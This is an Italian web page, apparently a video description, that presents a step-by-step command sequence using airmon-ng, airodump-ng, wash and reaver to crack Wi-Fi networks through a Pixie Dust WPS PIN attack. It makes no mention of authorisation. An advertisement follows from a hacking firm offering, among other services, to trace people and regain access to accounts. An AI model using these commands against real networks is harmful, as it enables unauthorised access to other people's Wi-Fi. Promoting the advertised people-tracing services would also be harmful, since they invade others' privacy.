CRACCARE RETI Wi-Fi in meno di due minuti – KALI LINUX – WPA WPS

Utilizzato un attacco di tipo Pixie Dust WPS. Se la scheda di rete non è compatibile con Kali Linux potrebbe non funzionare in fase di associazione all’access point. Se non funziona, provare a specificare il canale dell’access point con airmon-ng start (man airmon-ng per maggiori dettagli).

RIASSUNTO
#chiude i processi che possono causare conflitti
airmon-ng check kill
#avvia l’interfaccia di rete wireless in modalità monitor
airmon-ng start wlan0
#controlla le reti nei dintorni con wpa + wps
airodump-ng wlan0mon –wps
#altro comando per trovare reti con wps abilitato
wash -i wlan0mon
#avvia reaver per il crack del pin
reaver -i wlan0mon -b BSSID -K 1
Video Rating: / 5


Siamo la Società Leader nel settore dell'Hacking Etico e della Cybersecurity che ha supportato migliaia di privati, professionisti ed aziende in oltre 20 anni di attività (più di 600 solo quest'anno).

Stai cercando prodotti per l’hacking, la sicurezza informatica e il penetration testing? Hai bisogno di bonificare il tuo smartphone, il tuo pc o il tuo sito da virus e malware? Devi rintracciare una persona o recuperare delle informazioni urgenti? Devi riprendere possesso di un account, una mail o di una password che ti hanno sottratto? Vuoi acquistare device già configurati per sperimentare tutte le tecniche di hacking in modo facile e veloce? Hai esigenze particolari in ambito software o hardware? Possiamo aiutarti!

Contattaci subito per avere un aiuto immediato : dettagliaci tramite mail o Whatsapp che tipo di supporto ti occorre e ti invieremo un riscontro immediato!

Compila e invia il modulo qui sotto per inviarci subito una richiesta di supporto

Scrivi il tuo indirizzo email qui

Scrivi qui come possiamo aiutarti - ti supportiamo immediatamente per ogni tua esigenza!

chevron_left
chevron_right
Notifica Visitatori